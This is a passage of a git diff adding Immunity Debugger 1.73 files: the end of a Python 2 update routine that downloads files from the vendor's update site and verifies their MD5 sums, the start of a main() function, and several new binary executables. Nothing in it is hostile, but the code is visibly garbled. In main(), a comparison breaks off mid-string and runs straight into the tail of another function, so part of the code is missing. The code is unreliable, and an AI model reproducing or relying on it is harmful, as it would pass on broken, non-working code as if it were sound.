+ #download the file
+ current = testit(file)
+ time.sleep(1)
+ current.start()
+ urllib.urlretrieve(URL+file,file)
+ current.status = 0
+ time.sleep(0.5)
+ #check md5sum
+ checkf=open(file,"rb")
+ if md5.new(checkf.read()).hexdigest() == md5sum:
+ print "Checking MD5SUM: %s OK!" % md5sum
+ checkf.close()
+ else:
+ print "MD5SUM FAILED, REDOWNLOADING FILE"
+ checkf.close()
+ doDownload(file)
+ return
+
+def main():
+ print "Connecting to Immunity Debugger Update Site..."
+ URL="https://auth.immunityinc.com/ImmunityDebugger/update/"
+ filelist = urllib.urlopen(URL+"filelist")
+ if filelist.readline()[0:8] == ' 0:
+ return output
+ return ""
+
+
+
+
\ No newline at end of file
diff --git a/1.73/debugger.pyd b/1.73/debugger.pyd
new file mode 100755
index 0000000..b78e4c9
Binary files /dev/null and b/1.73/debugger.pyd differ
diff --git a/1.73/loaddll.exe b/1.73/loaddll.exe
new file mode 100755
index 0000000..66c4ef6
Binary files /dev/null and b/1.73/loaddll.exe differ
diff --git a/1.73/uninstall.exe b/1.73/uninstall.exe
new file mode 100755
index 0000000..0cac2e3
Binary files /dev/null and b/1.73/uninstall.exe differ
diff --git a/1.73/updater.exe b/1.73/updater.exe
new file mode 100755
index 0000000..8c3b092
Binary files /dev/null and b/1.73/updater.exe differ
